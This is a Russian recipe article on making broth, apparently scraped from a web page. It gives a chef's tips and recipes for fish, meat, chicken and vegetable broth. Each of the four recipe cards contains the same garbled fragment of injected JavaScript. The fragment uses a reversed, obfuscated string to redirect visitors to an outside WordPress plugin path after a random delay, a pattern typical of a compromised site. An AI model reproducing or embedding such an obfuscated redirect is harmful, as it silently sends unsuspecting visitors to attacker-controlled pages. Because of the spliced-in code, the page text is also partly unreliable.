Как сварить правильный бульон

Вкусный бульон — главная составляющая большинства супов и соусов. Овощной, рыбный, куриный, мясной — сегодня вы узнаете, что нужно сделать, чтобы научиться их готовить правильно.

 

Артур Самандов

шеф-повар гастропаба Hardy Pub

Бульон может быть трёх типов:

 

  • белый или консоме — в его основе курица, мясо или рыба;
  • жёлтый — с запечённым кореньями;
  • коричневый или красный, например жу или демигоясс — для него запекаются и мясо, и кости, и овощи. В коричневый можно также добавить вино и сливочное масло.

 

Если вы варите овощной бульон, предварительно запеките корни зелени и овощей — они дают цвет и «раскрывают» блюда, в которых вы потом используете бульон. Рыбный можно сварить и за полчаса, так как рыба быстро даёт аромат и вкус. Фенхель, стебель сельдерея и репчатый лук станут идеальным дополнением к белой рыбе. Мясной бульон делайте с использованием мозговой кости, которую предварительно тоже можно запечь с розмарином и тимьяном. Главное правило мясного бульона — не переборщить с овощами, иначе он получится морковным, а не мясным.

 

Всегда используйте только свежие продукты — так ваш бульон не станет мутным. А ещё можете добавить букет гарни. Это набор специй и трав, который вы складываете в марлю, перевязываете шпагатом и помещаете в бульон за несколько минут до готовности.

Рыбный бульон

Как сварить правильный бульон. Изображение номер 1

Фото: cocklesandmussels.com

Как сварить правильный бульон

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

40 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

8,5 стакана

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

кости или головы палтуса/трески

1 кг

большая луковица

1 шт.

порей

1 шт.

лавровый лист

1 шт.

петрушка

1 веточка

тимьян

1 веточка

перец горошком

3 шт.

  1. Поместите кости в кастрюлю. К ним добавьте нарезанный на дольки лук, белый стебель порея, разрезанный на четыре части, лавровый лист, петрушку, тимьян и перец. Залейте 10 стаканами воды.
  2. Поставьте на огонь. Как только вода закипит, убавьте температуру и варите около 30 минут. Периодически снимайте пену шумовкой.
  3. Процедите бульон несколько раз.
  4. Бульон можно хранить в морозильной камере не более двух месяцев — для этого остудите его и перелейте в пластмассовую баночку или контейнер.

Мясной бульон

Как сварить правильный бульон. Изображение номер 2

Фото: bonappetit.com

Как сварить правильный бульон

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

5 ЧАСОВ 30 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

2 литра

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

говяжьи кости

2,5 кг

морковь

5 шт.

стебли сельдерея

4 шт.

луковицы

2 шт.

головка чеснока

1 шт.

петрушка

1/2 пучка

тимьян

4 веточки

лавровый лист

2 шт.

перец горошком

1/4 ч. л.

  1. Разогрейте духовку до 200 градусов. Разложите кости на противне и запекайте 25—30 минут, периодически их переворачивая.
  2. Очистите и нарежьте морковь и сельдерей. Луковицы и чеснок разрежьте пополам. Сложите овощи на противень к костям и запекайте ещё полчаса.
  3. Переместите ингредиенты в кастрюлю, залейте холодной водой и поставьте на огонь. Добавьте тимьян, петрушку, лавровый лист и перец. Как только жидкость закипит, убавьте огонь и варите четыре часа, периодически помешивая. Добавляйте воду, если она будет выкипать.
  4. Процедите бульон несколько раз.

Куриный бульон

Как сварить правильный бульон. Изображение номер 3

Фото: elizabethrider.com

Как сварить правильный бульон

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

4 ЧАСА 20 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

2—3 л

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

целая курица

2 кг

головка чеснока

1/2 шт.

сельдерей

5 стеблей

порей

1 шт.

репчатый лук

2 шт.

морковь

2 шт.

лавровый лист

3 шт.

свежий розмарин

2 веточки

свежая петрушка

5 веточек

тимьян

5 веточек

перец горошком

5 шт.

вода

6 л

  1. Положите курицу, чеснок, овощи, травы и перец в большую кастрюлю, залейте водой. Как только закипит, снимите пенку и убавьте огонь до минимума.
  2. Варите три—четыре часа, затем процедите бульон. Остудите и перелейте в контейнер или пластмассовую банку.
  3. Храните в морозильной камере не более двух месяцев. Без заморозки бульон хранится около четырёх дней.

Овощной бульон

Как сварить правильный бульон. Изображение номер 4

Как сварить правильный бульон

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

2 ЧАСА

КОЛИЧЕСТВО ПОРЦИЙ:

2 литра

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

оливковое масло

1 ст. л.

луковицы

2 шт.

сельдерей

10 стеблей

морковь

2 шт.

шампиньоны

200 г

чеснок

1 головка

петрушка

6 веточки

лавровый лист

1 шт.

перец горошком

1 ст. л.

  1. Очистите лук и разрежьте на половинки. Стебли сельдерея и морковь разрежьте на кусочки размером около двух сантиметров. Чеснок очистите.
  2. Разогрейте в большой кастрюле с толстым дном масло. Сложите туда все ингредиенты и обжаривайте пять минут. Добавьте четыре литра воды. Как только закипит, убавьте огонь и варите полтора часа.
  3. Процедите бульон несколько раз. Храните в холодильнике не дольше трёх дней или в морозильной камере до трёх месяцев.
Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector